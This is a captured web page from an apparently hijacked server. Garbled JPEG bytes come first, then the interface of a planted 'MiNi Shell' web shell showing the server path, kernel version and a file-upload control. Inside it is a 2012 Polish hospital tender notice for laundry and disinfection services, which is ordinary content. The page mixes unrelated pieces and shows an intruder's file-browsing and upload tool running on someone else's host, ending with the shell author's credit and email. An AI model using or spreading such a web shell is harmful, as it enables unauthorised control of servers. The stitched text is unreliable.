JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120605/188586-N-2012.html

<p class="kh_header"><b>Włocławek: DIZ-35-2012  ŚWIADCZENIE  USŁUG  PRALNICZYCH  DLA SZPITALA WOJEWÓDZKIEGO WE WŁOCŁAWKU</b><br>
<b>Numer ogłoszenia: 188586 - 2012; data zamieszczenia: 05.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital.wloclawek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ-35-2012  ŚWIADCZENIE  USŁUG  PRALNICZYCH  DLA SZPITALA WOJEWÓDZKIEGO WE WŁOCŁAWKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest ŚWIADCZENIE USŁUG PRALNICZYCH DLA SZPITALA  WOJEWÓDZKIEGO WE  WŁOCŁAWKU w zakresie prania i dezynfekcji bielizny szpitalnej w ilościach   wynikających z bieżących potrzeb 
    Zamawiającego w następującym asortymencie:
l.p.	Rodzaj bielizny	szacunkowa max. ilość pranej bielizny
w skali  1 m-ca
1	 Czepki operacyjne męskie	80 sztuki
2	Fartuchy rozpinane	120 sztuk
3	Fartuchy operacyjne	300 sztuk
4	Fartuchy operacyjne barierowe MERTEX 1,2, Plus- firmy  GARMEX, firmy PROMEDICA	600 sztuk
5	Koszule operacyjne	30 sztuk
6	Firany	40 sztuk
7	Śpiochy	250 sztuk
8	Kaftaniki noworodkowe 	250 sztuk
9	Koce małe	160 sztuk
10	Koce  duże	200 sztuk
11	Materace gąbkowe	5 sztuk
12	Mop-y	30 sztuk
13	Nogawice operacyjne	4 sztuki
14	Obrusy	35 sztuk
15	PIDŻAMY 
15a	bluza	350 sztuk
15b	spodnie	350 sztuk
16	Pieluchy tetrowe	10 sztuk
17	Pasy do mocowania chorych firmy SALVA FIX (poliester)	20 sztuk
18	Podkłady	250 sztuk
19	Poduszki z pierza lub z wkładem syntetycznym	80 sztuk
20	Parawany materiałowe	10 sztuk
21	Powłoczki na poduszkę  kolorowe noworodkowe 	1400 sztuk
22	Poduszka -Jasiek- z tworzywa syntetycznego	5 sztuk
23	Kołderka mała z tworzywa syntetycznego	5 sztuk
24	Kołderka duża z tworzywa syntetycznego	5 sztuk
25	Pokrowce na materace -EKOLASTIC	130 sztuk
26	Pończochy p-żylakowe 	4 pary
27	Worki materiałowe	50 sztuki
28	Zasłony	15 sztuk
29	Pokrowce  materiałowe na materace 	5 sztuk
30	Pokrowce materiałowe na wałek operacyjny lub na mikroskop	7 sztuk
31	Poszewka typu -Jasiek-	30 sztuk
32	Powłoczka na poduszkę	4500 sztuk
33	Poszwa	5000 sztuk
34	Poszwa dziecięca	300 sztuk
35	Prześcieradła operacyjne	500 sztuk
36	Prześcieradła	6000 sztuk
37	Prześcieradła dziecięce	350 sztuk
38	Ręczniki	450 sztuk
39	Serwety operacyjne	1700 sztuk
40	Szlafroki  duże	20 sztuk
41	UBRANIA OPERACYJNE
41a	bluza	500 sztuk
41b	spodnie	300 sztuk
41c	spódnica	100 sztuk
41d	sukienka	90 sztuk
42	Ubrania operacyjne  wielokrotnego użytku - MEDITEX, firmy ARLEN
42a	bluza	500 sztuk
42b	spodnie	500 sztuk
42c	sukienka	250 sztuk
43	UBRANIA PERSONELU
43a	bluza	200 sztuk
43b	spodnie	50 sztuk
43c	spódnica	60 sztuk

2. Rodzaj kolorystycznego oznakowania bielizny szpitalnej: napis SZPITAL WOJEWÓDZKI  WŁOCŁAWEK:

A/ KOLOR NAPISU NIEBIESKI OZNACZA:
a/ pościel dla dorosłych: (poszwa   -  2,0 x 1,60 m, powłoczka na poduszkę - 0,9 x 0,8 m, prześcieradła - 2,7 x   1,6 m,  podkłady   -  1,1 x 1,6 m)

B/ KOLOR NAPISU ZIELONY OZNACZA:
a/ pościel dla dorosłych - Oddział DERMATOLOGII: ( poszwa  -  2,0 x 1,60 m, powłoczka na poduszkę -  0,9 x 0,8 m, prześcieradła - 2,7 x 1,6 m, podkłady   -  1,1 x 1,6 m )
C/ KOLOR NAPISU RÓŻOWY OZNACZA:
a/ pościel dziecięca: (powłoczka  na poduszkę - 0,9 x 0,8 m)
b/ pościel dziecięca:  (poszwa dziecięca - 1,4 x 0,9 m,  prześcieradło 2,2 x 1,6 m )

D/ BIELIZNA  OZNACZA:
a/ powłoczki na poduszkę  noworodkowe w rozmiarze 0,9 x 0,8 m

Przewidywana ilość prania w skali 1 miesiąca wynosi  około 16 000 kg. 

3. Zakres usługi , o której mowa w punkcie 1 obejmuje:
- pranie,  suszenie,  maglowanie, prasowanie;
- dezynfekcję bielizny szpitalnej, w tym również dezynfekcję chemiczno-termiczą  kocy, pokrowców materiałowych,  pokrowców na materace ECOLASTIK, fartuchów operacyjnych  barierowych MERTEX 1,2, Plus-firmy  GARMEX, firmy PROMEDICA ;
-  dezynfekcja poduszek i materacy gąbkowych (nie zanieczyszczonych materiałem   biologicznym) w komorze dezynfekcyjnej wyposażonej w urządzenie do rejestracji  parametrów decydujących o skuteczności procesu  dezynfekcji, a w przypadku zanieczyszczenia materiałem   biologicznym, w/w asortyment   będzie  podlegał  procesowi prania i następnie dezynfekcji w komorze dezynfekcyjnej;
- naprawa bielizny płaskiej oraz fasonowej uszkodzonej podczas prania, w tym wymiana guzików, lub zamków  błyskawicznych uszkodzonych w procesie prania;
- sortowanie i pakowanie w worki foliowe (odporne na uszkodzenia w czasie transportu)  bielizny wg. asortymentu oraz wg oznakowania  kolorowym napisem podanym wyżej;
- odzież fasonowa personelu (mundurki, fartuchy nieoperacyjne) dostarczana na wieszakach ,  zabezpieczona workiem foliowym (pokrowcem) przed zabrudzeniem;
- transport bielizny od i do Zleceniodawcy - odbiór bielizny brudnej i  dostarczenie czystej bielizny do pomieszczenia wskazanego przez Zleceniodawcę;
- pracownik pojazdu transportowego Wykonawcy zobowiązany będzie do czynnego udziału w  wyładunku  i załadunku  bielizny szpitalnej, musi być wyposażony w odpowiednią wymaganą przepisami  sanitarnymi odzież ochronną oraz  znać i przestrzegać zasady  postępowania przy transporcie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga w niniejszym postępowaniu złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis warunków udziału w postępowaniu oraz sposobu dokonywania oceny spełnienia tych warunków.

O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące :
1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania;
2. posiadania wiedzy i doświadczenia;
3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania  zamówienia;
4. sytuacji ekonomicznej i finansowej;

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie -spełnia-nie spełnia-
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu. 

1. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 1 Zamawiający żąda  następujących dokumentów:

a. koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek ich posiadania na podjecie działalności  gospodarczej w zakresie objętym zamówieniem;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 2 Zamawiający żąda złożenia następujących dokumentów:
a. wykaz wykonanych, a przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług o charakterze i  złożoności porównywalnej z przedmiotem zamówienia, w okresie ostatnich trzech lat przed upływem terminu składania   ofert  albo wniosków o dopuszczenie do udziału  w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz   z  załączeniem dokumentu  potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie.
   Zamawiający wymaga przedstawienia, zgodnie  z Załącznikiem nr 5 do niniejszej  specyfikacji, co najmniej 3 usług o  wartości 100.000,00 zł brutto każda.

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie -spełnia-nie spełnia-
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 3 Zamawiający żąda złożenia następujących dokumentów ( zgodnie z Załącznikiem nr 7 do niniejszej specyfikacji) :
a. pisemne oświadczenie, że Wykonawca dysponuje oddzielnymi środkami transportu bielizny czystej i brudnej lub  środkiem transportu posiadającym szczelną i podzielną komorę załadunkowa tak, aby bielizna czysta nie miała 
możliwości  jakiegokolwiek kontaktu z bielizną brudną zgodnie z wymaganiami sanitarno-  epidemiologicznymi;
b. pisemne oświadczenie o posiadaniu maszyn pralniczych o łącznym przerobie minimum  20 000 kg  miesięcznie;
c. pisemne oświadczenie Wykonawcy do  przeprowadzania dezynfekcji poduszek i materacy gąbkowych (nie zanieczyszczonych materiałem  biologicznym) w komorze dezynfekcyjnej wyposażonej w urządzenie do  rejestracji parametrów decydujących o skuteczności procesu  dezynfekcji a w przypadku zanieczyszczenia  materiałem  biologicznym, ww. asortyment   będzie  podlegał  procesowi prania i następnie dezynfekcji w komorze   dezynfekcyjnej;

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie -spełnia-nie spełnia-
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w  szczególności 
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do  dyspozycji  niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie -spełnia-nie spełnia-
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4. Celem potwierdzenia warunku określonego w rozdziale V pkt 4 Zamawiający żąda złożenia następujących dokumentów:
 a. pisemne oświadczenie, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie wykonywanej działalności gospodarczej.

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie -spełnia-nie spełnia-
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6. Celem potwierdzenia, że oferowana usługa odpowiada opisowi przedmiotu zamówienia  Zamawiający żąda (zgodnie z Załącznikiem nr 7 do niniejszej specyfikacji):
a. pisemnego oświadczenia Wykonawcy, że  usługa, o której mowa w Rozdziale III pkt 1 wykonywana będzie wyłącznie  przy użyciu   badanych i atestowanych środków piorących i dezynfekcyjnych dopuszczonych do  obrotu  oraz posiadających wpis w  Urzędzie Rejestracji  Produktów Leczniczych, Wyrobów Medycznych   i  Produktów Biobójczych na produkty  przeznaczone do dezynfekcji   bielizny i dopuszczone do obrotu zgodnie z ustawą z  dnia 13 września 2002 r. o  produktach biobójczych (Dz. U.2007r.,  Nr 39, poz. 252);

b. pisemnego oświadczenia Wykonawcy, że procesy prania i wykonywania innych czynności objętych zakresem usługi określonej   w Rozdziale III pkt 1 będą  wykonywane  zgodnie z zaleceniami producenta i określonymi na etykietach 
 metek  dołączonych do każdej sztuki bielizny   płaskiej czy  odzieży fasonowej a w przypadku braku etykiet metek na  danej  sztuce bielizny płaskiej czy odzieży, lub gdy są one nieczytelne, Wykonawca   zobowiązany jest dokonać  czynności   objętych zakresem usługi z zachowaniem najwyższej staranności, zgodnie z  posiadaną wiedzą i  doświadczeniem;
 
c. pisemnego oświadczenia Wykonawcy, iż w ramach realizacji przedmiotu zamówienia zobowiązuje się do utrzymania odpowiedniego  stanu  techniczno-sanitarnego pralni. 
   
Uwaga: brak któregokolwiek z  dokumentów określonych w Rozdziale V i VI spowoduje   odrzucenie  oferty na podstawie  art. 89 ust.1 pkt 2  ustawy Prawo zamówień   publicznych

7. Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest do złożenia niżej  wymienionych dokumentów:
a. wypełniony i podpisany -Druk ofertowy-, zgodnie z  Załącznikiem nr 1 do niniejszej  specyfikacji
b. pisemne oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 2 do niniejszej specyfikacji;
d. pisemne oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia, zgodnie z Załącznikiem nr 3;
e. zaakceptowany i podpisany projekt umowy stanowiący Załącznik nr 4 do niniejszej  specyfikacji;
f. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów rejestracyjnych) w przypadku  podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych ;  
g. upoważnienie do podpisania Oferty (fakultatywnie).

Wszystkie dokumenty muszą być złożone w oryginale lub w postaci kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty.
Jeżeli wykonawca składa dokumenty stanowiące tajemnicę firmy w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji, winny być opatrzone napisem  -TAJNE-. W tym celu należy również wypełnić Załącznik nr 6 do niniejszej specyfikacji.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Dopuszcza się możliwość zmiany umowy w postaci aneksu w przypadku kiedy zmiana ta  będzie korzystna dla  zamawiającego lub gdyby zamawiający miał ponieść niewspółmierną stratę  przez   zaniechanie zmiany. 
2. Zamawiający przewiduje również zgodnie z art. 144 ustawy Prawo zamówień publicznych  możliwość dokonania  istotnych zmian postanowień zawartej umowy w stosunku do   treści oferty,  na podstawie której dokonano wyboru  Wykonawcy (w formie aneksu), w przypadku  wystąpienia  co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych  warunków   ich wprowadzenia: 
a/  zmiany spowodowane siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy;   
b/ ustawowa zmiana obowiązującej stawki podatku od towarów i usług (VAT).
    
 Wszystkie powyższe postanowienia w podpunktach stanowią katalog zmian, na które Zamawiający  może wyrazić zgodę. 
 Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki , ul. Wieniecka 49,  87-800 Włocławek, pokój 303 (budynek  administracji, pokój 303).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2012 godzina 10:00, miejsce: Szpital Wojewódzki , ul. Wieniecka 49,  87-800 Włocławek, pokój 303 (budynek  administracji, pokój 303).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com